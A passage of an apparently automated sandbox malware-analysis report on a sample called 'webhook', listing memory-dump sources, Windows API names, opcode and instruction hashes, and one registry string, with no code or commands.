                          • Associated: 00000000.00000002.1800826480.00007FF650540000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800857104.00007FF650549000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800869131.00007FF65054C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800880533.00007FF65054E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff650540000_webhook.jbxd
                          Similarity
                          • API ID:
                          • String ID: *MEMCAB
                          • API String ID: 0-3211172518
                          • Opcode ID: d326e7aa94b67cf4d4d3d0379e3d5024a1c04b5e8baa646fa99e55709f362e69
                          • Instruction ID: 99ba8c43d9acb45b0425dcf5783f5784d521c8c46c5a62303cb08b03c7c515b1
                          • Opcode Fuzzy Hash: d326e7aa94b67cf4d4d3d0379e3d5024a1c04b5e8baa646fa99e55709f362e69
                          • Instruction Fuzzy Hash: 32313831A19B47B5EA509B20E6443FD73A0FB44790F584236D99DA2790EF3CE4A9C740
                          APIs
                          Strings
                          • System\CurrentControlSet\Control\Session Manager\FileRenameOperations, xrefs: 00007FF650542FAF
                          Memory Dump Source
                          • Source File: 00000000.00000002.1800842992.00007FF650541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF650540000, based on PE: true
                          • Associated: 00000000.00000002.1800826480.00007FF650540000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800857104.00007FF650549000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800869131.00007FF65054C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800880533.00007FF65054E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff650540000_webhook.jbxd
                          Similarity
                          • API ID: CloseInfoOpenQuery
                          • String ID: System\CurrentControlSet\Control\Session Manager\FileRenameOperations
                          • API String ID: 2142960691-1430103811
                          • Opcode ID: 47349caa1c797a3ce88789d8bb3edd23980ba6ecef902e538d3c134507dba548
                          • Instruction ID: 9b5bf13874131b7b22a6403284692c07e6aef98731efd70aeeaad7b6da43b058
                          • Opcode Fuzzy Hash: 47349caa1c797a3ce88789d8bb3edd23980ba6ecef902e538d3c134507dba548
                          • Instruction Fuzzy Hash: 9B11A732A18B8197E7108F65F44456AFBA5F789750B545229EBC983B28DF38D465CF00
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1800842992.00007FF650541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF650540000, based on PE: true
                          • Associated: 00000000.00000002.1800826480.00007FF650540000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800857104.00007FF650549000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800869131.00007FF65054C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800880533.00007FF65054E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff650540000_webhook.jbxd
                          Similarity
                          • API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
                          • String ID:
                          • API String ID: 140117192-0
                          • Opcode ID: 4f65c121b0890e46cb18bda7ebc0f2de684189390e2c9d24e6a7faa72a08dfdf
                          • Instruction ID: b3ca3554e6546e6e6b69a060654236f357ad218fc54c1fa826e6257a642e54c7
                          • Opcode Fuzzy Hash: 4f65c121b0890e46cb18bda7ebc0f2de684189390e2c9d24e6a7faa72a08dfdf
                          • Instruction Fuzzy Hash: B641D839A09B02B1EB508B58F9903A577A4FB85784F584136D9CDE3764DF7CE465C700
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1800842992.00007FF650541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF650540000, based on PE: true
                          • Associated: 00000000.00000002.1800826480.00007FF650540000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800857104.00007FF650549000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800869131.00007FF65054C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800880533.00007FF65054E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff650540000_webhook.jbxd
                          Similarity
                          • API ID: Current$CountTickTime$CounterFileImageInfoNonwritablePerformanceProcessQuerySleepStartupSystemThread_amsg_exit_cexit_inittermexit
                          • String ID:
                          • API String ID: 1267577977-0
                          • Opcode ID: 67f1339d4cfeb4c52d404ce0f2d4713285857e4fe6d3d857e098854071e4ffab
                          • Instruction ID: 4687a55540db4f4758ee0eb6fe9ddeb81bfa7f638456898d6e5335903af8a03e
                          • Opcode Fuzzy Hash: 67f1339d4cfeb4c52d404ce0f2d4713285857e4fe6d3d857e098854071e4ffab
                          • Instruction Fuzzy Hash: 2D312B35A0CA43B6E660DB21EA513F937A0EF85394F9C0435DACDE33A1DE6CE460C604
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1800842992.00007FF650541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF650540000, based on PE: true
                          • Associated: 00000000.00000002.1800826480.00007FF650540000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800857104.00007FF650549000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800869131.00007FF65054C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800880533.00007FF65054E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff650540000_webhook.jbxd
                          Similarity
                          • API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
                          • String ID:
                          • API String ID: 140117192-0
                          • Opcode ID: 0495dd60c7ced2f9c3233f3fe49d434584880a05317a0e056b8bda12f970aa15
                          • Instruction ID: cd93906c57fef736c8ffc17951a3608bebfe2eaf8fa14041745b8873e402d201
                          • Opcode Fuzzy Hash: 0495dd60c7ced2f9c3233f3fe49d434584880a05317a0e056b8bda12f970aa15
                          • Instruction Fuzzy Hash: E331387960CB02A1EB508B58F5803A9BB64FBC8744F584136DACD93764DFBCD029C700
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1800842992.00007FF650541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF650540000, based on PE: true
                          • Associated: 00000000.00000002.1800826480.00007FF650540000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800857104.00007FF650549000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800869131.00007FF65054C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800880533.00007FF65054E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff650540000_webhook.jbxd
                          Similarity
                          • API ID: Resource$DialogFindFreeIndirectLoadParam
                          • String ID:
                          • API String ID: 1214682469-0
                          • Opcode ID: f84731171d3fff93161b8d11559f90ff40e31cde7bbef708dcb137f56a2588f9
                          • Instruction ID: 4d72530afea39313971790356ba1e90f984d87f9eb056791de774bdce5cf21ae
                          • Opcode Fuzzy Hash: f84731171d3fff93161b8d11559f90ff40e31cde7bbef708dcb137f56a2588f9
                          • Instruction Fuzzy Hash: AD113031A09B42A6EA108F11F5042BABAA0FB9AFD0F4C4634DE9D57B98DF3CD014CB00
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1800842992.00007FF650541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF650540000, based on PE: true
                          • Associated: 00000000.00000002.1800826480.00007FF650540000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800857104.00007FF650549000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800869131.00007FF65054C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800880533.00007FF65054E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff650540000_webhook.jbxd
                          Similarity
                          • API ID: Char$Prev$Next
                          • String ID:
                          • API String ID: 3260447230-0
                          • Opcode ID: 02f17945edf2851cb969e6e0e4490fbce2b65d3964085eb94fd71e724a66b365
                          • Instruction ID: a7a2a58eae5cff40db9259c49f5724abe4e15a5c5b01ff5bb9b6f873eb54f229
                          • Opcode Fuzzy Hash: 02f17945edf2851cb969e6e0e4490fbce2b65d3964085eb94fd71e724a66b365
                          • Instruction Fuzzy Hash: 9F118D71908E82B5FB114B21A6042BDBB91BB4AFE0F5C5670DA9E93385DF2CD4558701
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1800842992.00007FF650541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF650540000, based on PE: true
                          • Associated: 00000000.00000002.1800826480.00007FF650540000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800857104.00007FF650549000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800869131.00007FF65054C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800880533.00007FF65054E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff650540000_webhook.jbxd
                          Similarity
                          • API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
                          • String ID:
                          • API String ID: 140117192-0
                          • Opcode ID: 89b728313985ec8d8bc5760cebbad4f07023fb81a7c1741a44e0131cd2ee41d3
                          • Instruction ID: 1c12d80f79d2a19837d4332bdedb14a00681649887de3a547bf12c55b680a60b
                          • Opcode Fuzzy Hash: 89b728313985ec8d8bc5760cebbad4f07023fb81a7c1741a44e0131cd2ee41d3
                          • Instruction Fuzzy Hash: DC21C039A08B46B1EB408F54F9803A97BA4FB85B44F580036DACDA3764DFBDE065C700